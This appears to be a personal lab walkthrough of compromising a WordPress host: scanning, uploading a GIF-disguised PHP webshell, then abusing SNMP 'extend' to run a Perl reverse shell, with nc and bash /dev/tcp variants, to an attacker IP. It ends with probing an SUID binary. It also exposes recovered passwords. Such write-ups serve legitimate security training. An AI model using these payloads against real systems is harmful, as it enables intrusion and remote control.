SNMP: HTB-Intense

$ nmap -sC -sV -A -Pn 192.168.65.113

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-17 15:53 EST
Nmap scan report for 192.168.65.113
Host is up (0.11s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f0:85:61:65:d3:88:ad:49:6b:38:f4:ac:5b:90:4f:2d (RSA)
| 256 05:80:90:92:ff:9e:d6:0e:2f:70:37:6d:86:76:db:05 (ECDSA)
|_ 256 c3:57:35:b9:8a:a5:c0:f8:b1:b2:e9:73:09:ad:c7:9a (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-generator: WordPress 5.5.3
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Escape – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at

https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.72 seconds

@ http://192.168.65.113/

● No robots.txt
$ nikto -h 192.168.65.113
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.65.113
+ Target Hostname: 192.168.65.113
+ Target Port: 80
+ Start Time: 2020-11-17 16:00:20 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to
protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render
the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size:
5b370ac710db3, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache
2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7917 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2020-11-17 16:19:18 (GMT-5) (1138 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

// @ http://192.168.140.113:8080/ -> too slow

● WordPress, user: admin

● robots.txt: @ http://192.168.65.113:8080/robots.txt
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
Sitemap: http://192.168.120.163:8080/wp-sitemap.xml

$ nikto -h 192.168.65.113 -p 8080

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.65.113
+ Target Hostname: 192.168.65.113
+ Target Port: 8080
+ Start Time: 2020-11-17 16:04:37 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Retrieved x-powered-by header: PHP/7.4.12
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to
protect against some forms of XSS
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ The X-Content-Type-Options header is not set. This could allow the user agent to render
the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://192.168.65.113:8080/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ RFC-1918 IP address found in the 'link' header. The IP is "192.168.120.163".
+ Uncommon header 'link' found, with contents: <http://192.168.120.163:8080/wp-json/>;
rel="https://api.w.org/"
+ Web Server returns a valid response with junk HTTP methods, this may cause false
positives.
+ OSVDB-3092: /dev/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ /server-status: Apache server-status interface found (protected/forbidden)
+ 7919 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2020-11-17 16:26:04 (GMT-5) (1287 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
$ sudo wpscan --url http://192.168.140.113:8080 --enumerate ap,at,tt,cb,dbe,u,m
--api-token PVFZh921eainmnPnfsEbWbtrlyHURINPNvvlKrSiY2Y
_______________________________________________________________
__ _______ _____
\\ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team

Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.140.113:8080/ [192.168.140.113]

[+] Started: Mon Nov 23 18:16:38 2020

Interesting Finding(s):

[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.38 (Debian)
| - X-Powered-By: PHP/7.4.12
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] http://192.168.140.113:8080/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.140.113:8080/xmlrpc.php

| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| -
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://192.168.140.113:8080/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.140.113:8080/wp-cron.php

| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.3 identified (Latest, released on 2020-10-30).

| Found By: Emoji Settings (Passive Detection)
| - http://192.168.140.113:8080/, Match:
'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.140.113:8080/, Match: 'WordPress 5.5.3'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating All Themes (via Passive and Aggressive Methods)

Checking Known Locations - Time: 00:14:00 <==========================> (21490
/ 21490) 100.00% Time: 00:14:00
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] atom
| Location: http://192.168.140.113:8080/wp-content/themes/atom/
| Style URL: http://192.168.140.113:8080/wp-content/themes/atom/style.css
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.140.113:8080/wp-content/themes/atom/, status: 200
|
| The version could not be determined.

[+] twentynineteen
| Location: http://192.168.140.113:8080/wp-content/themes/twentynineteen/
| Latest Version: 1.7 (up to date)
| Last Updated: 2020-08-11T00:00:00.000Z
| Readme: http://192.168.140.113:8080/wp-content/themes/twentynineteen/readme.txt
| Style URL: http://192.168.140.113:8080/wp-content/themes/twentynineteen/style.css
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block
editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.140.113:8080/wp-content/themes/twentynineteen/, status: 500
|
| Version: 1.7 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.140.113:8080/wp-content/themes/twentynineteen/style.css, Match:
'Version: 1.7'

[+] twentyseventeen
 | Location: http://192.168.140.113:8080/wp-content/themes/twentyseventeen/
| Latest Version: 2.4 (up to date)
| Last Updated: 2020-08-11T00:00:00.000Z
| Readme: http://192.168.140.113:8080/wp-content/themes/twentyseventeen/readme.txt
| Style URL: http://192.168.140.113:8080/wp-content/themes/twentyseventeen/style.css
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive
featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.140.113:8080/wp-content/themes/twentyseventeen/, status: 500
|
| Version: 2.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.140.113:8080/wp-content/themes/twentyseventeen/style.css, Match:
'Version: 2.4'

[+] twentytwenty
| Location: http://192.168.140.113:8080/wp-content/themes/twentytwenty/
| Latest Version: 1.5 (up to date)
| Last Updated: 2020-08-11T00:00:00.000Z
| Readme: http://192.168.140.113:8080/wp-content/themes/twentytwenty/readme.txt
| Style URL: http://192.168.140.113:8080/wp-content/themes/twentytwenty/style.css
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the
flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.140.113:8080/wp-content/themes/twentytwenty/, status: 500
|
| Version: 1.5 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.140.113:8080/wp-content/themes/twentytwenty/style.css, Match:
'Version: 1.5'

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)

Checking Known Locations - Time: 00:01:54 <============================>
(2568 / 2568) 100.00% Time: 00:01:54

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)

Checking Config Backups - Time: 00:00:01 <=================================>
(21 / 21) 100.00% Time: 00:00:01

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)

Checking DB Exports - Time: 00:00:02
<=====================================> (36 / 36) 100.00% Time: 00:00:02

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be
set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:05 <==========================> (100
/ 100) 100.00% Time: 00:00:05

[i] No Medias Found.

[+] Enumerating Users (via Passive and Aggressive Methods)

Brute Forcing Author IDs - Time: 00:00:01 <================================>
(10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
| Found By: Wp Json Api (Aggressive Detection)
| - http://192.168.140.113:8080/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] WPVulnDB API OK

| Plan: free
| Requests Done (during the scan): 5
| Requests Remaining: 35

[+] Finished: Mon Nov 23 18:36:09 2020

[+] Requests Done: 24291
[+] Cached Requests: 11
[+] Data Sent: 6.083 MB
[+] Data Received: 8.195 MB
[+] Memory used: 265.477 MB
[+] Elapsed time: 00:19:30

$ gobuster dir -u http://192.168.65.113:8080 -w

/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 4 -q -x html,txt,php
/index.php (Status: 301)
/rss (Status: 200)
/login (Status: 302)
/0 (Status: 301)
/feed (Status: 200)
/atom (Status: 200)
/wp-content (Status: 301)
/admin (Status: 302)
/wp-login.php (Status: 200)
/rss2 (Status: 200)
/license.txt (Status: 200)
/wp-includes (Status: 301)
/dev (Status: 301)
/wp-register.php (Status: 301)
/wp-rss2.php (Status: 301)
/rdf (Status: 200)
/page1 (Status: 200)
/readme.html (Status: 200)
/robots.txt (Status: 200)
/' (Status: 301)
/dashboard (Status: 302)
...

@ http://192.168.65.113:8080/dev/

$ gobuster dir -u http://192.168.193.113:8080/dev -w

/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 4 -q -x html,txt,php
/index.php (Status: 200)
/rss (Status: 200)
/feed (Status: 200)
/uploads (Status: 301)
/atom (Status: 200)
/css (Status: 301)
/rss2 (Status: 200)
/wp-register.php (Status: 301)
/wp-rss2.php (Status: 301)
/rdf (Status: 200)
/' (Status: 301)
...

// We can upload a gif file and view it

@ http://192.168.193.113:8080/dev/uploads/closed.gif
TODO: Can bypass file upload but cannot RCE

$ cat cmd.gif
GIF89a
<?php system($_GET['cmd']); ?>

// Upload “cmd.php.gif”, use Burp to capture the request, then change the filename to
“cmd.php” and Send the modified request
-> Successfully upload file “cmd.php”

// Now, we can run commands on webpage

@ http://192.168.149.113:8080/dev/uploads/cmd.php?cmd=id

// Cannot run command to get the reverse shell on the webpage even via Burp. So we
upload the php-reverse-shell.php like above, and get the shell.

// Trigger http://192.168.149.113:8080/dev/uploads/php-reverse-shell.php

// Cannot get a better shell, so we need to escape ???

// cannot go to /home, maybe there is no user for this box

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

// Use curl to get linpeas.sh -> in a Docker container ???

/usr/local/bin/docker-entrypoint.sh

// Found DB_PASSWORD: W@rdpr355!!53cur3

// Find local.txt in /var/www

Local.txt: 166906be7b3f61c4495708cac61efc52

Need to escape the Docker container ???

// Install docker if needed
https://www.digitalocean.com/community/tutorials/how-to-install-and-use-docker-on-ubunt
u-18-04

/var/backups/.snmpd.conf
-> Found a word that looks like a password 53cur3M0NiT0riNg
// Interesting script: /usr/local/bin/docker-entrypoint.sh ???
// Cannot find mysql to access the wordpress database ???

$ cat /var/backups/.snmpd.conf
########################################################################
#######
#
# EXAMPLE.conf:
# An example configuration file for configuring the Net-SNMP agent ('snmpd')
# See the 'snmpd.conf(5)' man page for details
#
# Some entries are deliberately commented out, and will need to be explicitly activated
#
########################################################################
#######
#
# AGENT BEHAVIOUR
#

# Listen for connections from the local system only

agentAddress udp:0.0.0.0:161
# Listen for connections on all interfaces (both IPv4 *and* IPv6)
#agentAddress udp:161,udp6:[::1]:161

########################################################################
#######
#
# SNMPv3 AUTHENTICATION
#
# Note that these particular settings don't actually belong here.
# They should be copied to the file /var/lib/snmp/snmpd.conf
# and the passwords changed, before being uncommented in that file *only*.
# Then restart the agent

# createUser authOnlyUser MD5 "remember to change this password"

# createUser authPrivUser SHA "remember to change this one too" DES
# createUser internalUser MD5 "this is only ever used internally, but still change the
password"

# If you also change the usernames (which might be sensible),

# then remember to update the other occurances in this example config file to match.
########################################################################
#######
#
# ACCESS CONTROL
#

# system + hrSystem groups only

view systemonly included .1.3.6.1.2.1.1
view systemonly included .1.3.6.1.2.1.25.1

# Full access from the local host

#rocommunity public localhost
# Default access to basic system info
rocommunity public default -V systemonly
# rocommunity6 is for IPv6
rocommunity6 public default -V systemonly

rocommunity 53cur3M0NiT0riNg
# Full access from an example network
# Adjust this network address to match your local
# settings, change the community string,
# and check the 'agentAddress' setting above
#rocommunity secret 10.0.0.0/16

# Full read-only access for SNMPv3

rouser authOnlyUser
# Full write access for encrypted requests
# Remember to activate the 'createUser' lines above
#rwuser authPrivUser priv

# It's no longer typically necessary to use the full 'com2sec/group/access' configuration

# r[ow]user and r[ow]community, together with suitable views, should cover most
requirements

########################################################################
#######
#
# SYSTEM INFORMATION
#

# Note that setting these values here, results in the corresponding MIB objects being
'read-only'
# See snmpd.conf(5) for more details
sysLocation Sitting on the Dock of the Bay
sysContact Me <me@example.org>
# Application + End-to-End layers
sysServices 72
#
# Process Monitoring
#
# At least one 'mountd' process
proc mountd
# No more than 4 'ntalkd' processes - 0 is OK
proc ntalkd 4
# At least one 'sendmail' process, but no more than 10
proc sendmail 10 1

# Walk the UCD-SNMP-MIB::prTable to see the resulting output

# Note that this table will be empty if there are no "proc" entries in the snmpd.conf file

#
# Disk Monitoring
#
# 10MBs required on root disk, 5% free on /var, 10% free on all other
disks
disk / 10000
disk /var 5%
includeAllDisks 10%

# Walk the UCD-SNMP-MIB::dskTable to see the resulting output

# Note that this table will be empty if there are no "disk" entries in the snmpd.conf file

#
# System Load
#
# Unacceptable 1-, 5-, and 15-minute load averages
load 12 10 5

# Walk the UCD-SNMP-MIB::laTable to see the resulting output

# Note that this table *will* be populated, even without a "load" entry in the snmpd.conf
file

########################################################################
#######
#
# ACTIVE MONITORING
#

# send SNMPv1 traps

trapsink localhost public
# send SNMPv2c traps
#trap2sink localhost public
# send SNMPv2c INFORMs
#informsink localhost public

# Note that you typically only want *one* of these three lines
# Uncommenting two (or all three) will result in multiple copies of each notification.
#
# Event MIB - automatically generate alerts
#
# Remember to activate the 'createUser' lines above
iquerySecName internalUser
rouser internalUser
# generate traps on UCD error conditions
defaultMonitors yes
# generate traps on linkUp/Down
linkUpDownNotifications yes

########################################################################
#######
#
# EXTENDING THE AGENT
#

#
# Arbitrary extension commands
#
extend test1 /bin/echo Hello, world!
extend-sh test2 echo Hello, world! ; echo Hi there ; exit 35
extend-sh test3 /bin/sh /tmp/shtest

# Note that this last entry requires the script '/tmp/shtest' to be created first,
# containing the same three shell commands, before the line is uncommented

# Walk the NET-SNMP-EXTEND-MIB tables (nsExtendConfigTable,

nsExtendOutput1Table
# and nsExtendOutput2Table) to see the resulting output

# Note that the "extend" directive supercedes the previous "exec" and "sh" directives
# However, walking the UCD-SNMP-MIB::extTable should still returns the same output,
# as well as the fuller results in the above tables.

#
# "Pass-through" MIB extension command
#
#pass .1.3.6.1.4.1.8072.2.255 /bin/sh PREFIX/local/passtest
#pass .1.3.6.1.4.1.8072.2.255 /usr/bin/perl PREFIX/local/passtest.pl

# Note that this requires one of the two 'passtest' scripts to be installed first,
# before the appropriate line is uncommented.
# These scripts can be found in the 'local' directory of the source distribution,
# and are not installed automatically.

# Walk the NET-SNMP-PASS-MIB::netSnmpPassExamples subtree to see the resulting

output
#
# AgentX Sub-agents
#
# Run as an AgentX master agent
master agentx
# Listen for network connections (from localhost)
# rather than the default named socket /var/agentx/master
#agentXSocket tcp:localhost:705

Read more:
● https://medium.com/rangeforce/snmp-arbitrary-command-execution-19a6088c888
e
● http://www.net-snmp.org/docs/man/snmpd.conf.html#lbAJ
● https://digi.ninja/blog/snmp_to_shell.php
● http://net-snmp.sourceforge.net/wiki/index.php/Tut:Extending_snmpd_using_shell_
scripts
● https://book.hacktricks.xyz/pentesting/pentesting-snmp

SNMP: Simple Network Management Protocol which is a protocol to monitor and manage
network devices like modems, routers, servers, printers, IP cameras, UPS devices and
even power strips.

Access controls
There are two configuration directives, usually in /etc/snmp/snmpd.conf, called
rocommunity and rwcommunity.
● rocommunity — specifies the read-only community string
● rwcommunity — specifies the read-write community string
The SNMP community string is essentially a plaintext password that allows access to a
device’s statistics and configuration. That’s why you really should consider them as
passwords — make them long, unpredictable and be aware of what service or whom you
give them to.
// Running this command from our Kali machine, we see some information as shown in the
config file
$ snmpwalk -v2c -c 53cur3M0NiT0riNg 192.168.243.113

-> Run for a while but still did not see STRING “Hello, world”

// Found another way to run commands and get their outputs through
NET_SNMP-EXTEND_MIB module

Walk the NET-SNMP-EXTEND-MIB tables (nsExtendConfigTable,

nsExtendOutput1Table and nsExtendOutput2Table) to see the resulting output

https://vincent.bernat.ch/en/blog/2012-extending-netsnmp
// Try to run it, get the errors
$ snmpwalk -v2c -c 53cur3M0NiT0riNg 192.168.243.113
NET-SNMP-EXTEND-MIB::nsExtendOutput1Table

// Found the solution to install missing modules

https://ixnfo.com/en/installing-mib-in-ubuntu-and-solving-the-error-snmp-cannot-find-modul
e.html

$ sudo apt-get install snmp-mibs-downloader

$ sudo download-mibs
$ sudo sed -i "s/^\(mibs *:\).*/#\1/" /etc/snmp/snmp.conf
$ sudo service snmpd restart

// Rerun again, now we see the STRING “Hello, world”

$ snmpwalk -v2c -c 53cur3M0NiT0riNg 192.168.243.113
NET-SNMP-EXTEND-MIB::nsExtendOutput1Table
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."test1" = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."test2" = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."test3" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."test1" = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."test2" = STRING: Hello, world!
Hi there
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."test3" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."test1" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."test2" = INTEGER: 2
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."test3" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendResult."test1" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendResult."test2" = INTEGER: 8960
NET-SNMP-EXTEND-MIB::nsExtendResult."test3" = INTEGER: 512

$ snmpwalk -v2c -c 53cur3M0NiT0riNg 192.168.243.113

NET-SNMP-EXTEND-MIB::nsExtendOutput2Table
NET-SNMP-EXTEND-MIB::nsExtendOutLine."test1".1 = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendOutLine."test2".1 = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendOutLine."test2".2 = STRING: Hi there
NET-SNMP-EXTEND-MIB::nsExtendOutLine."test3".1 = STRING:

$ snmpwalk -v2c -c 53cur3M0NiT0riNg 192.168.243.113

NET-SNMP-EXTEND-MIB::nsExtendConfigTable
NET-SNMP-EXTEND-MIB::nsExtendCommand."test1" = STRING: /bin/echo
NET-SNMP-EXTEND-MIB::nsExtendCommand."test2" = STRING: echo
NET-SNMP-EXTEND-MIB::nsExtendCommand."test3" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendArgs."test1" = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendArgs."test2" = STRING: Hello, world! ; echo Hi there ;
exit 35
NET-SNMP-EXTEND-MIB::nsExtendArgs."test3" = STRING: /tmp/shtest
NET-SNMP-EXTEND-MIB::nsExtendInput."test1" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."test2" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."test3" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."test1" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."test2" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."test3" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."test1" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendExecType."test2" = INTEGER: shell(2)
NET-SNMP-EXTEND-MIB::nsExtendExecType."test3" = INTEGER: shell(2)
NET-SNMP-EXTEND-MIB::nsExtendRunType."test1" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."test2" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."test3" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."test1" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStorage."test2" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStorage."test3" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."test1" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendStatus."test2" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendStatus."test3" = INTEGER: active(1)
// Create shtest script as follows as the current shell is limited, we failed to run reverse
shell binary, and for rev commands, no netcat, cannot run bash, but we have Perl 5, and
here we use Perl rev shell command
$ cat shtest
#nc -e /bin/sh 192.168.49.243 80
#/bin/bash -i >& /dev/tcp/192.168.49.243/80 0>&1
perl -e 'use
Socket;$i="192.168.49.243";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyna
me("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(ST
DOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

// Upload the script to /tmp

// Trigger the rev shell command

$ snmpwalk -v2c -c 53cur3M0NiT0riNg 192.168.243.113
NET-SNMP-EXTEND-MIB::nsExtendOutput1Table

NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."test1" = STRING: Hello, world!

NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."test2" = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."test3" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."test1" = STRING: Hello, world!
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."test2" = STRING: Hello, world!
Hi there
Timeout: No Response from 192.168.243.113
-> From user www-data, we get shell on port 80 as user Debian-snmp

// Get a better shell using python3

// There is home dir for user tom

Local.txt: 95c4e16e3a9507a2cf96a5d9eb174da3
(the local.txt we found above is valid)
// Found SUID binary
Debian-snmp@escape:/tmp$ /usr/bin/logconsole

/$$ /$$
| $$ | $$
| $$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$$ /$$$$$$ | $$ /$$$$$$
| $$ /$$__ $$ /$$__ $$ /$$_____/ /$$__ $$| $$__ $$ /$$_____/ /$$__ $$| $$ /$$__ $$
| $$| $$ \ $$| $$ \ $$| $$ | $$ \ $$| $$ \ $$| $$$$$$ | $$ \ $$| $$| $$$$$$$$
| $$| $$ | $$| $$ | $$| $$ | $$ | $$| $$ | $$ \____ $$| $$ | $$| $$| $$_____/
| $$| $$$$$$/| $$$$$$$| $$$$$$$| $$$$$$/| $$ | $$ /$$$$$$$/| $$$$$$/| $$| $$$$$$$
|__/ \______/ \____ $$ \_______/ \______/ |__/ |__/|_______/ \______/ |__/ \_______/
/$$ \ $$
| $$$$$$/
\______/

1. About the Sytem

2. Current Process Status
3. List all the Users Logged in and out
4. Quick summary of User Logged in
5. IP Routing Table
6. CPU Information
7. To Exit
99. Generate the Report

Enter the option ==>

// /bin/uname -a

// /bin/ps aux

// /usr/bin/last

// /usr/bin/w

// /sbin/ip route | column -t

// lscpu

// Invalid Option!!!!

// Option 99 -> SegFault Core dumped -> buffer overflow ???

// Setup Python server to host logconsole binary on target machine, then download it to
our Kali machine to analyze
$ python3 -m http.server 80
$ strings logconsole
/lib64/ld-linux-x86-64.so.2
mgUa
fopen
__isoc99_scanf
setreuid
putchar
stdin
popen
printf
fgets
stdout
fputs
fclose
system
getuid
fwrite
geteuid
__cxa_finalize
setvbuf
__libc_start_main
libc.so.6
GLIBC_2.7
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
/home/tom/logconsole.txt
*********************************************************************
/$$ /$$
| $$ | $$
| $$ /$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$$ /$$$$$$ | $$ /$$$$$$
| $$ /$$__ $$ /$$__ $$ /$$_____/ /$$__ $$| $$__ $$ /$$_____/ /$$__ $$| $$ /$$__ $$
| $$| $$ \ $$| $$ \ $$| $$ | $$ \ $$| $$ \ $$| $$$$$$ | $$ \ $$| $$| $$$$$$$$
| $$| $$ | $$| $$ | $$| $$ | $$ | $$| $$ | $$ \____ $$| $$ | $$| $$| $$_____/
| $$| $$$$$$/| $$$$$$$| $$$$$$$| $$$$$$/| $$ | $$ /$$$$$$$/| $$$$$$/| $$| $$$$$$$
|__/ \______/ \____ $$ \_______/ \______/ |__/ |__/|_______/ \______/ |__/ \_______/
/$$ \ $$
| $$$$$$/
\______/

[1;31m
1. About the Sytem
2. Current Process Status
3. List all the Users Logged in and out
4. Quick summary of User Logged in
5. IP Routing Table
6. CPU Information
7. To Exit
99. Generate the Report
[01;33m
Enter the option ==>
/bin/uname -a
/bin/ps aux
/usr/bin/last
/usr/bin/w
/sbin/ip route | column -t
lscpu
Invalid Option!!!!!
Report is Ready!!!
;*3$"
GCC: (Debian 10.2.0-7) 10.2.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
syslog.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
putchar@@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
stdout@@GLIBC_2.2.5
stdin@@GLIBC_2.2.5
_edata
fclose@@GLIBC_2.2.5
getuid@@GLIBC_2.2.5
system@@GLIBC_2.2.5
